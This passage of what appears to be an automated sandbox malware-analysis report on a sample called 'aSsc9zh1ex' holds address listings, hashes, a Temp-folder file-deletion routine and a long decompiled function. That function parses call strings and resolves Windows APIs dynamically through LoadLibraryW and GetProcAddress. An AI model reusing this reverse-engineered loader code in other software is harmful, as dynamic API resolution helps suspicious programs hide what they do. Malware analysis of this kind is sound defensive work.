                                                                                                                              0x00405c70
                                                                                                                              0x00405d90
                                                                                                                              0x00405d92
                                                                                                                              0x00405d95
                                                                                                                              0x00405de6
                                                                                                                              0x00405de6
                                                                                                                              0x00405de6
                                                                                                                              0x00405d97
                                                                                                                              0x00405d9a
                                                                                                                              0x00405da5
                                                                                                                              0x00405daa
                                                                                                                              0x00405dac
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405daf
                                                                                                                              0x00405dbb
                                                                                                                              0x00405dc0
                                                                                                                              0x00405dc2
                                                                                                                              0x00000000
                                                                                                                              0x00405ddd
                                                                                                                              0x00405dc4
                                                                                                                              0x00405dc7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405dcc
                                                                                                                              0x00000000
                                                                                                                              0x00405dd3
                                                                                                                              0x00405d9c
                                                                                                                              0x00405d9c
                                                                                                                              0x00000000
                                                                                                                              0x00405d9c
                                                                                                                              0x00405c76
                                                                                                                              0x00405c79
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405c79

                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNELBASE(?,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                                                                                                                              • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                                                                                                                              • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405D7F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                                                                                              • API String ID: 2035342205-314529707
                                                                                                                              • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                                                                                                                              • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                                                                                                                              • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                                                                                                                              • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F001BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E6F001BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E6F0012BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E6F0012BB();
				_t321 = E6F0012E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E6F0013B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E6F00162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x6f0023e8) & 0x000000ff) * 4 +  &M6F00235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E6F0012CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E6F0012BB();
											 &_v12 = E6F001B86( &_v12);
											__eax = E6F001510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6F001B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6F001B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6f00405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6F001B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E6F0016BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E6F0013B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E6F0016BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324); // executed
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E6F0013B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E6F0013B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E6F0013B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E6F0012CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E6F0013B1(_t90) * 4);
					goto L165;
				}
			}

































































                                                                                                                              0x6f001c07
                                                                                                                              0x6f001c0a
                                                                                                                              0x6f001c0d
                                                                                                                              0x6f001c10
                                                                                                                              0x6f001c13
                                                                                                                              0x6f001c16
                                                                                                                              0x6f001c19
                                                                                                                              0x6f001c1b
                                                                                                                              0x6f001c1e
                                                                                                                              0x6f001c21
                                                                                                                              0x6f001c26
                                                                                                                              0x6f001c29
                                                                                                                              0x6f001c31
                                                                                                                              0x6f001c39
                                                                                                                              0x6f001c3b
                                                                                                                              0x6f001c3e
                                                                                                                              0x6f001c46
                                                                                                                              0x6f001c46
                                                                                                                              0x6f001c4b
                                                                                                                              0x6f001c4e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001c5b
                                                                                                                              0x6f001c60
                                                                                                                              0x6f001c62
                                                                                                                              0x6f001cf4
                                                                                                                              0x6f001cf4
                                                                                                                              0x6f001cf4
                                                                                                                              0x6f001cf8
                                                                                                                              0x6f001cfb
                                                                                                                              0x6f001cfd
                                                                                                                              0x6f001d1f
                                                                                                                              0x6f001d21
                                                                                                                              0x6f001d24
                                                                                                                              0x6f001d33
                                                                                                                              0x6f001d35
                                                                                                                              0x6f001d3b
                                                                                                                              0x6f001d3b
                                                                                                                              0x6f001d41
                                                                                                                              0x6f001d44
                                                                                                                              0x6f001d44
                                                                                                                              0x6f001d47
                                                                                                                              0x6f001d47
                                                                                                                              0x6f001d4d
                                                                                                                              0x6f001d4f
                                                                                                                              0x6f001d4f
                                                                                                                              0x6f001d51
                                                                                                                              0x6f001d54
                                                                                                                              0x6f001d57
                                                                                                                              0x6f001d5d
                                                                                                                              0x6f001d63
                                                                                                                              0x6f001d66
                                                                                                                              0x6f001d8a
                                                                                                                              0x6f001d8d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001d90
                                                                                                                              0x6f001d92
                                                                                                                              0x6f001da0
                                                                                                                              0x6f001da3
                                                                                                                              0x6f001da5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001da7
                                                                                                                              0x6f001da7
                                                                                                                              0x6f001da7
                                                                                                                              0x6f001dad
                                                                                                                              0x6f001daf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001db1
                                                                                                                              0x6f001db3
                                                                                                                              0x6f001db5
                                                                                                                              0x6f001db7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001db7
                                                                                                                              0x6f001db9
                                                                                                                              0x6f001dbb
                                                                                                                              0x6f001dbd
                                                                                                                              0x6f001dbd
                                                                                                                              0x6f001dc3
                                                                                                                              0x6f001dc9
                                                                                                                              0x6f001dcb
                                                                                                                              0x6f001ddf
                                                                                                                              0x6f001ddf
                                                                                                                              0x6f001de1
                                                                                                                              0x6f001dcd
                                                                                                                              0x6f001dd3
                                                                                                                              0x6f001dd6
                                                                                                                              0x6f001dd6
                                                                                                                              0x00000000
                                                                                                                              0x6f001d68
                                                                                                                              0x6f001d68
                                                                                                                              0x6f001d68
                                                                                                                              0x6f001d69
                                                                                                                              0x6f001d71
                                                                                                                              0x6f001d75
                                                                                                                              0x6f001d7b
                                                                                                                              0x6f001d7f
                                                                                                                              0x00000000
                                                                                                                              0x6f001d7f
                                                                                                                              0x6f001d6b
                                                                                                                              0x6f001d6b
                                                                                                                              0x6f001d6c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001d6e
                                                                                                                              0x6f001d6f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001d6f
                                                                                                                              0x6f001cff
                                                                                                                              0x6f001d00
                                                                                                                              0x6f001d09
                                                                                                                              0x6f001d0c
                                                                                                                              0x6f001d19
                                                                                                                              0x6f001d19
                                                                                                                              0x6f001d0e
                                                                                                                              0x6f001d0e
                                                                                                                              0x6f001de7
                                                                                                                              0x6f001dea
                                                                                                                              0x6f001dee
                                                                                                                              0x6f001e61
                                                                                                                              0x6f001e65
                                                                                                                              0x6f001c43
                                                                                                                              0x00000000
                                                                                                                              0x6f001c43
                                                                                                                              0x00000000
                                                                                                                              0x6f001e65
                                                                                                                              0x6f001cfd
                                                                                                                              0x6f001c68
                                                                                                                              0x6f001c6b
                                                                                                                              0x6f001cce
                                                                                                                              0x6f001cd1
                                                                                                                              0x6f001ce3
                                                                                                                              0x6f001ce3
                                                                                                                              0x6f001ce6
                                                                                                                              0x6f001df3
                                                                                                                              0x6f001df6
                                                                                                                              0x6f001df6
                                                                                                                              0x6f001df8
                                                                                                                              0x6f0021ae
                                                                                                                              0x6f0021c6
                                                                                                                              0x6f0021c6
                                                                                                                              0x6f0021c9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021b3
                                                                                                                              0x6f0021b4
                                                                                                                              0x6f0021b7
                                                                                                                              0x6f0021ba
                                                                                                                              0x6f002244
                                                                                                                              0x6f00224b
                                                                                                                              0x6f002251
                                                                                                                              0x6f002255
                                                                                                                              0x6f001e5c
                                                                                                                              0x6f001e5d
                                                                                                                              0x6f001e5d
                                                                                                                              0x6f001e5e
                                                                                                                              0x00000000
                                                                                                                              0x6f001e5e
                                                                                                                              0x6f0021c0
                                                                                                                              0x6f0021c3
                                                                                                                              0x6f0021c3
                                                                                                                              0x6f0021cb
                                                                                                                              0x6f0021ce
                                                                                                                              0x6f002238
                                                                                                                              0x6f001e51
                                                                                                                              0x6f001e54
                                                                                                                              0x6f001e57
                                                                                                                              0x6f001e5a
                                                                                                                              0x6f001e5a
                                                                                                                              0x00000000
                                                                                                                              0x6f001e5a
                                                                                                                              0x6f0021d0
                                                                                                                              0x6f0021d3
                                                                                                                              0x6f0021da
                                                                                                                              0x6f0021da
                                                                                                                              0x6f0021dd
                                                                                                                              0x6f0021e1
                                                                                                                              0x6f0021f5
                                                                                                                              0x6f0021f5
                                                                                                                              0x6f0021f8
                                                                                                                              0x6f0021fc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0021fe
                                                                                                                              0x6f002202
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002204
                                                                                                                              0x6f00220b
                                                                                                                              0x6f00220b
                                                                                                                              0x6f002211
                                                                                                                              0x6f002214
